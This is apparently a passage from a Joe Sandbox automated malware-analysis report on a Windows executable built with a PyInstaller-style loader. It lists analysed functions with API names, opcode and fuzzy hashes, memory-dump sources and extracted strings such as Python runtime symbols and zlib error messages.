                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                      • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                      • Instruction ID: 2de4f26aef4a5b3e9c6e134038262d46ec0bc3baf182b0f353800aed688d131d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39219223F1C74242FA90B761DC90679A6829F847D0F8982B5DA5E873C5CF6CF4458320
                                                                                                                                                                                                                                      Function 00007FF70AF0BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                      • Instruction ID: 10952221de418d8ed30ce924127b23db621f77b7a1fcb8c20c9ae54372dbcb48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41B033A0820187FA34AB69E940679F7A5EF55B85F900271DA8EC7691CF2DF402CB61
                                                                                                                                                                                                                                      Function 00007FF70AEF7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                      • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                      • Instruction ID: b6fc69e9af38730cc8854a37869a7b1758ee6dd377aa39ffb8933750b3c350f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3217C22B0865286FA10BA22AD157BAE651FF45BD4FC844B0EE4D4B786DF7DE1418720
                                                                                                                                                                                                                                      Function 00007FF70AF0B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                      • Instruction ID: add30c43ce8e63f8e82bfcfe1e3518145a79bfc55c4659c0461433c091d73cb2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6316D23A1864286F7517B65CC41B7DA660AF40BA6FD201B5EA6D833D2DF7CF4418731
                                                                                                                                                                                                                                      Function 00007FF70AF099D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                      • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                      • Instruction ID: 5b238d7ce1e8125ae7035ed88fbb38457c7473da8b8a9fc4cf3612eee2032bb6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33218132E047818AFB24AF64C8846EC73A0EF44718F844675D61D86AD6EF78E544C760
                                                                                                                                                                                                                                      Function 00007FF70AF06004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                      • Instruction ID: b085b8653ca7fec3c25dfae4fb8990d541bce2b2f9bb30323eb3c288c9e2de20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3115423A1C64141FA60BF61D80097DE264AF45BC1FC58071EB4CD7A96DF7DF5408B20
                                                                                                                                                                                                                                      Function 00007FF70AF163C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                      • Instruction ID: 8015551807c12e99e3128f894cc23b8a52d38d6e18f163b301efe295db38206e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F21877361868187EBA5AF18D840779B6A0FF84B94F944274E69DC77D5DF3CE4008B10
                                                                                                                                                                                                                                      Function 00007FF70AF0042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                      • Instruction ID: 788f8dc0f82b614d1b8e4cc5293acc88a32f972fd1d59c2380323b68b5e7fa19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7901C227A0874140FA20BB52DD01969E691AF81FE0F884671DE5C93BD6CF3CF0014314
                                                                                                                                                                                                                                      Function 00007FF70AF0EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF70AF0B39A,?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA), ref: 00007FF70AF0EC5D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                      • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                      • Instruction ID: a78118a8db4834ceeef7da0a25f9335e26a27e49eec8385fd8aafaa7247c1787
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85F04F46B0920680FE657A61DC61AB5C2805F84B80FCD89B0C94DCA3D2DF1DF4808230
                                                                                                                                                                                                                                      Function 00007FF70AF0D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF70AF00D00,?,?,?,00007FF70AF0236A,?,?,?,?,?,00007FF70AF03B59), ref: 00007FF70AF0D6AA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                      • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                      • Instruction ID: e14ee3cf04d34127004069ba82dc187481a9ee47ac0b7e00eb176b0da9320a45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0D412A0A34685FE6476A1DC51A79D2905F94BA1FC847B0DD2ECA3D2DF6DF4808630

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 00007FF70AEF5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5830
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5842
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5879
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF588B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58A4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58B6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58CF
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58E1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58FD
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF590F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF592B
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF593D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5959
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF596B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5987
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5999
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF59B5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF59C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                                                      • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                      • Instruction ID: 3ae1ba6c7feea0d69bff46b7f5ddf52eacfc4dd7090b78bdc46ac3b03b067f87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0228C26A4EB47D2FA59BB55EC551B4A2A0EF18795FC490B9C82E02360FF3CF5498270
                                                                                                                                                                                                                                      Function 00007FF70AF1411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                      • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                      • Instruction ID: 801667d3d435f902b798758c7542725e12f008919bf0a076a982b0191e7fba25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16B2B1B3A182828AF7659F64D840BFDB7A1FF94389F905175DA0E57B84DB38F9008B50
                                                                                                                                                                                                                                      Function 00007FF70AEFAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                      • API String ID: 0-2665694366
                                                                                                                                                                                                                                      • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                      • Instruction ID: 1c57e1d8a643af64cb9cbf51fec3132a6c21ba1a5e7f2bf9fb0fc4458a10d643
